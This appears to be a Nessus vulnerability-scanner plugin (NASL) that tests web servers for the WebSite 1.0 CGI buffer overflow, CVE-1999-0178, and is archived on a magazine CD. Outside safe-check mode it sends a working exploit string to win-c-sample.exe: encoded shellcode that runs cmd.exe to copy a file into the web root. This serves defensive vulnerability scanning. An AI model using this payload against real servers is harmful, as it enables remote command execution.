home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / WebSite.nasl < prev    next >
Text File  |  2005-01-14  |  3KB  |  103 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10008);
  10.  script_bugtraq_id(2078);
  11.  script_version ("$Revision: 1.22 $");
  12.  script_cve_id("CVE-1999-0178");
  13. # Name :
  14.  script_name(english:"WebSite 1.0 buffer overflow",
  15.           francais:"WebSite 1.0 : dΘpassement de buffer");
  16.  
  17. # Description :
  18.   script_description(
  19.           english:string("There is a buffer overflow in some 
  20.         WebSite 1.0 CGI scripts which allow a remote intruder 
  21.         to execute any command on the remote host.
  22.  
  23.         Platform affected : WindowsNT
  24.         
  25.         Solution : Upgrade to the latest version, or contact 
  26.         your vendor for a patch.
  27.         
  28.         Risk factor : High"),
  29.  
  30.         francais:string("Dans certains cgi WebSite 1.0, un dΘpassement de buffer permet α un intrus d'executer n'importe quelle commande sur le serveur cible.\n
  31. SystΦme affectΘ : WindowsNT\nFacteur de risque : ElevΘ"));
  32.  
  33.  
  34.  
  35. # Copyright :
  36.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  37.            francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  38.  
  39. # Summary :
  40.   script_summary(english:"WebSite 1.0 CGI arbitrary code execution",
  41.            francais:"Execute du code arbitraire sur la machine distante");
  42.          
  43. # Family
  44.   script_family(english:"Remote file access",
  45.           francais:"AccΦs aux fichiers distants");
  46.         
  47.  script_category(ACT_MIXED_ATTACK); # mixed
  48.  script_dependencie("find_service.nes", "no404.nasl");
  49.  script_require_ports("Services/www", 80);
  50.  exit();
  51. }
  52.  
  53. ##########################
  54. #             #
  55. # The actual script code # 
  56. #             #
  57. ##########################
  58.  
  59. include("http_func.inc");
  60. include("http_keepalive.inc");
  61. port = get_http_port(default:80);
  62.  
  63.  
  64. if(safe_checks())
  65. {
  66.  res = is_cgi_installed_ka(item:"/cgi-shl/win-c-sample.exe", port:port);
  67.  if(res)
  68.  {
  69.   alrt = "
  70. There may be buffer overflow in the remote cgi win-c-sample.exe.
  71. An attacker may use this flaw to execute arbitrary commands
  72. on this host.
  73.  
  74. *** Nessus reports this vulnerability using only
  75. *** information that was gathered. Use caution
  76. *** when testing without safe checks enabled.
  77.  
  78. Solution : delete it
  79. Risk factor : High";
  80.  
  81.   security_hole(port:port, data:alrt);
  82.  }
  83.  exit(0);
  84. }
  85.  
  86.  
  87. command = "/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\\y[X%050PzPA9%01u%F0%83%E9%10%FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\x1.htm";
  88.  
  89. res = is_cgi_installed_ka(item:"x1.htm", port:port);
  90. if(!res)
  91. {
  92.  is_cgi_installed_ka(item:command, port:port);
  93.  res = is_cgi_installed_ka(item:"x1.htm", port:port);
  94.  if(res)security_hole(port);
  95. }
  96.  
  97.  
  98.  
  99.  
  100.  
  101.           
  102.